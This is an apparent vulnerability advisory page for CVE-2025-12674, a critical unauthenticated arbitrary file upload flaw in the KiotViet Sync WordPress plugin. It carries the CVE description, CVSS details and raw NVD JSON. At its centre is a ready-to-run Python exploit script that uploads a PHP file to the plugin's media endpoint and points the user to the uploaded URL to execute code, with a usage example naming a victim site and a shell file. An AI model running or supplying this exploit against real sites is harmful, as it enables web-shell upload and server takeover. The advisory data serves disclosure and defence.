Security Vulnerability Report
中文
CVE-2025-12674 CVSS 9.8 CRITICAL

CVE-2025-12674

Published: 2025-11-05 08:15:33
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The KiotViet Sync plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the create_media() function in all versions up to, and including, 1.8.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

KiotViet Sync插件 <= 1.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12674 PoC - Arbitrary File Upload in KiotViet Sync Plugin # Target: WordPress site with KiotViet Sync plugin <= 1.8.5 def exploit(target_url, file_path): """ Exploit arbitrary file upload vulnerability in KiotViet Sync plugin Args: target_url: Base URL of the WordPress site file_path: Path to the malicious file to upload """ # Read malicious PHP file with open(file_path, 'rb') as f: file_content = f.read() # Construct the vulnerable endpoint endpoint = f"{target_url.rstrip('/')}/wp-json/kiotviet/v1/media" # Prepare multipart form data files = { 'file': ('malicious.php', file_content, 'application/x-php') } # Send malicious upload request (unauthenticated) try: response = requests.post(endpoint, files=files, timeout=10) if response.status_code == 200: result = response.json() uploaded_url = result.get('url', '') print(f"[+] File uploaded successfully!") print(f"[+] Uploaded URL: {uploaded_url}") print(f"[+] Access the file to execute code: {uploaded_url}") return uploaded_url else: print(f"[-] Upload failed. Status code: {response.status_code}") print(f"[-] Response: {response.text}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <malicious_file>") print(f"Example: python {sys.argv[0]} http://victim.com /tmp/shell.php") sys.exit(1) target = sys.argv[1] malicious_file = sys.argv[2] exploit(target, malicious_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12674", "sourceIdentifier": "[email protected]", "published": "2025-11-05T08:15:33.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KiotViet Sync plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the create_media() function in all versions up to, and including, 1.8.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://wordpress.org/plugins/kiotvietsync/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7fdd670f-2a71-4c1d-af46-f0fd05352f7e?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.